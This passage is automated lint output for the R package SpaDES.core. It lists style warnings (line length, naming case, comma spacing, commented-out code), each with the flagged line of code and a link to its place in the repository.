{\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/83379f464daca88d3620793e44d448596aac0122/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     